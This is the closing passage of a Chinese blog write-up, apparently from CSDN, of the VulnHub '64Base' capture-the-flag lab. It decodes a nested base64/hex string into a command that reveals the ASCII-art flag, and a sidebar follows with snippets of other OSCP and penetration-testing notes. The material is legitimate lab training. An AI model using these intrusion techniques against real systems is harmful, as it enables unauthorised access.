     root@kali:~# echo "NGU1NDZiMzI1YTQ0NTEzMjRlMzI0NTMxNTk1NDU1MzA0ZTU0NmI3YTRkNDQ1MTM1NGU0NDRkN2E0ZDU0NWE2OTRlNDQ2YjMwNGQ3YTRkMzU0ZDdhNDkzMTRmNTQ1NTM0NGU0NDZiMzM0ZTZhNTk3OTRlNDQ2MzdhNGY1NDVhNjg0ZTU0NmIzMTRlN2E2MzMzNGU3YTU5MzA1OTdhNWE2YjRlN2E2NzdhNGQ1NDU5Nzg0ZDdhNDkzMTRlNmE0ZDM0NGU2YTQ5MzA0ZTdhNTUzMjRlMzI0NTMyNGQ3YTYzMzU0ZDdhNTUzMzRmNTQ1NjY4NGU1NDYzMzA0ZTZhNjM3YTRlNDQ0ZDMyNGU3YTRlNmI0ZDMyNTE3NzU5NTE2ZjNkMGEK" |base64 -d|xxd -p -r|base64 -d|xxd -p -r|base64 -d
 base64 -d /var/local/.luke|less.real

    解码结果为 base64 -d /var/local/.luke|less.real,执行命令

     64base@64base:/tmp$ base64 -d /var/local/.luke|less.real
   ______  ______  ______  ______  ______  ______  ______  ______
  |______||______||______||______||______||______||______||______||______|
  __          __  _ _   _____
          \ \        / / | | | |  __ \
           \ \  /\  / /__| | | | |  | | ___  _ __   ___
            \ \/  \/ / _ \ | | | |  | |/ _ \| '_ \ / _ \
             \  /\  /  __/ | | | |__| | (_) | | | |  __/
          __  \/ _\/ \___|_|_|_|_____/ \___/|_|_|_|\___| _
          \ \   / /          |  __ \(_)   | | |_   _| | | |
           \ \_/ /__  _   _  | |  | |_  __| |   | | | |_| |
            \   / _ \| | | | | |  | | |/ _` |   | | | __| |
             | | (_) | |_| | | |__| | | (_| |  _| |_| |_|_|
             |_|\___/ \__,_| |_____/|_|\__,_| |_____|\__(_)
 
 _____ _ _ _ __ __ __  _ ___ _   __  ___  __ __  __  _  ___ _ _  __ _________
 %=x%= | |V| |_)|_ |_) | |_| |   |_) |_| (_  |_  |_) |  |_| |\| (_  %=x%=x%=x
 ~~~~~ | | | |  |_ | \ | | | |_  |_) | | __) |_  |   |_ | | | | __) ~~~~~~~~~
 LS
                  .-. .-.
                .=========.         E x t e r i o r ,   A e r i a l   V i e w
                ||.-.7.-.||         -----------------------------------------
                ||`-' `-'||
                `========='
                 `-'| |`-'8               1 .............. Sensor Suite Tower
           ______   |9|   ______          2 ... Heavy Twin Turbolaser Turrets
          /     /\__| |__/\     \         3 ............. Heavy Laser Turrets
         /  \_ / /  |_|  \ \ _/  \        4 ....... TIE Fighter Launch Chutes
        /___(\\\/         \///)___\       5 ............... Heavy Blast Doors
        \____\\`==========='//____/       6 .................... Guard towers
        /     '/ .-------. \\     \       7 ........ Shuttle Landing Platform
     __/     //. \`+---+'/ .\\     \__    8 ........... AT-AT Docking Station
    /\ \    ///x`.\|___|/.'x\\\    / /\   9 ................. Connecting Ramp
   /  \ \  //`-._//|   |\\_.2'\\  / /  \
  /  _.-==='_____//.-=-.\\_____`===-._  \
  \   `-===.\-.  \ `-=1' /  .-/.===-' 3 / The pre-fabricated,  multi-function
   \  / /  \\\ \  \.===./  /4///  \ \  /  Imperial garrison base is the back-
    \/_/    \\\ | /.---.\ | ///    \_\/   bone of the  Empire's  occupational
       \     \\\|/ |_m_| \|///     /      forces. These heavily-armoured for-
        \_____\=============/_____/       tresses have  walls up to 10 meters
        /____///    ___    \\\____\       thick  to  guard   against   ground
        \   (_//\__|||||__/\\_)   /       assaults,  and  powerful  deflector
         \  /  \|,,|||||,,|/  \  /        shields  protect  them  for  air or
          \_____|  | 5 | 6|_____/         space attacks.

    至此,已完成。

网络安全打工人
关注
专栏目录
64Base_3mrgnc3 - linux
战神/calmness的博客
01-03 418
Download Back to the Top Please remember that VulnHub is a free community resource so we are unable to check the machines that are provided to us. Before you download, please read our FAQs sections dealing with the dangers of running unknown VMs and our
http://coffeejp.com/bbs/forum.php?mod=viewthread,问题列表_华泰证券网络路演_新浪网
weixin_33481022的博客
06-07 10万+
游客问:http://keralaartsandcrafts.com/profession.php http://www.coffeecatscoffee.com/personal.php http://www.condorgun.com/pocket.php http://www.clinton-family-dentistry.com/relations.php http://nyvd...
64Base_3mrgnc3
底层社会中的弱智
07-12 650
总结: 这个靶机出现了几个奇怪的端口,使用nc或者telnet命令来连接端口查看信息 nc –nv ip port telnet ip port 前期的信息收集,不仅仅是nmap 还可以使用nitko –h、whatweb等等进行收集信息 Html2dic工具可以将页面的关键字转换成字典 Wget url –rq –O xxx.out Html2dic xxx.out | sort –u > xxx.dict 使用公钥登陆的时候要将公钥的权限调制最小 ssh –p 端口
靶场64Base_3mrgnc3的解题过程及个人心路历程
qq_42364315的博客
01-29 648
正值春节,遇到了新型冠状病毒,整个人都不好了,在家里都快憋疯了,于是乎开始做靶场打发时间,顺便死一波脑细胞 ————————————————————废话分割线———————————————————————————— 首先打开靶场看到的一幕 靶场就长这个样子,没有密码 没有办法登录 这个靶场有6个flag 然后打开我的kali 将靶机和kali放到同一个网段 仅主机模式 使用命令查...
国内外优秀的源码网站
摄心神,致虚极,守静笃
07-25 1万+
国内外优秀的源码网站 不管你是初学一门计算机语言或技术,还是想学习别人的经验和创意。做为一个开发人员,都会经常需要到搜索一些代码,下面是7个地方可以帮助你快速寻找到你需要的代码。 GitHub Code Search http://github.com/search 热门的开源代码库和和版本控制服务。 GitHub 在最近启动了CodeSearch .即使它才启动不久,但凭借
java红酒网站源码-OSCP-Survival:OSCP-生存
06-05
java网站源码OSCP-生存 这是一个克隆 这也可以查看 OSCP-生存指南 注意:本文档将目标 ip 称为导出变量 $ip。 要在命令行上设置此值,请使用以下语法: 出口ip=192.168.1.100 目录 卡利Linux 将目标 IP 地址设置为$...
java红酒网站源码-oscp-notes:oscp-notes
06-05
java网站源码OSCP - PWK(使用 Kali 进行渗透测试)注意事项 完成整个 OSCP 课程的完整 OSCP 笔记 目录 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH...
java红酒网站源码-OSCP-Notes:OSCP-笔记
06-05
java网站源码OSCP-笔记 卡利Linux 将目标 IP 地址设置为$ip系统变量export ip=192.168.1.100 查找文件的位置locate sbd.exe 在$PATH环境变量中搜索目录which sbd 查找名称中包含特定字符串的文件的搜索: find / -...
javasnmp源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-04
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
java红酒网站源码-OSCP-PWK-Notes-Public:OSCP-PWK-Notes-Public
06-05
OSCP 笔记 更加努力 欢迎 在卡利寻找自己的方式 查找、定位和哪个 定位 从由updatedb准备的数据库中读取 updatedb locate sdb.exe 哪一个 返回将在当前环境中执行的文件或链接的路径名。 它通过搜索 PATH 变量来做到...
Exploit writing tutorial part 8 : Win32 Egg Hunting
I'm a hack----
11-01 2万+
Introduction Easter is still far away, so this is probably the right time to talk about ways to hunting for eggs (so you would be prepared when the easter bunny brings you another 0day vulnerability)
vue pc端打印二维码
jingruoannan的博客
07-12 39万+
import Vue from "vue"; let a = "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAeAAAAKoCAYAAACvNywJAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF7svQmcZVdV73+6q7tr6Bq6q+fupDN15lETZEgkiIkSME4BgYeAQp78ow/Rv/8HweERnnwk8p5/RP+apwQUkI9IiCI8jRoQ0BDgETAkIWNn6KTn6qGqurrmqv6v7.
Vysor 1.7.6 chrome 插件破解
agoodcoolman的专栏
06-27 6403
在你的Chrome扩展文件里面,找到 名为uglify.js的文件。 我的文件地址: C:\Users\jin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gidgenkbbabolejbgbpnhbimgjbffefm\1.7.7_0 实在不行,你手动搜索一下,然后打开之后把文件格式化一下,这个自行百度。然后找到下面这个图
渗透技巧之403绕过_指纹识别
N的博客
03-14 7万+
渗透技巧之403绕过_指纹识别
http://www.115ps.com/all.html,plnt-20200804
weixin_32389853的博客
06-19 26万+
0001637207-20-000037.txt : 202008040001637207-20-000037.hdr.sgml : 2020080420200804161432ACCESSION NUMBER:0001637207-20-000037CONFORMED SUBMISSION TYPE:8-KPUBLIC DOCUMENT COUNT:15CONFORMED PERIOD OF R...
TCP Ports list (3498 ports in list)
热门推荐
zyb378747350的专栏
01-11 44万+
参考地址:https://www.gasmi.net/tcp.php TCP Ports list (3498 ports in list) 1 tcpmux TCP Port Service Multiplexer 2 compressnet Management Utility 3 compressnet Compression Process
最全user-agent,1000+条够你用
大蛇王的博客
07-12 1万+
User Agent中文名为用户代理,简称 UA,它是一个特殊字符串头,使得服务器能够识别客户使用的操作系统及版本、CPU 类型、浏览器及版本、浏览器渲染引擎、浏览器语言、浏览器插件等。 共计1456条 Mozilla/4.0 (compatible; GoogleToolbar 6.0.1411.1512; Windows XP 5.1; MSIE 6.0.2900.5512) Mozil...
台湾网站浏览排行榜
lifeifei13的专栏
11-06 1万+
Number of Requests to all sites accessed by Servertw.yimg.com : 5,933 : 21,455,519tw.image.bid.yahoo.com : 2,437 :
20130828可注册域名列表
落寞红尘
08-28 38万+
aabkx.com aapun.com abmrw.com abnks.com acphq.com acsgq.com actcL.com aderz.com adjni.com adojj.com adyjy.com afabd.com afcfx.com afrhi.com afubd.com ahscp.com aihtt.com aimfp.com ai
oscp 2023 challenge writeup-medtech-csdn博客
最新发布
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全和网络渗透感兴趣的读者来说是一个很有价值的参考资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值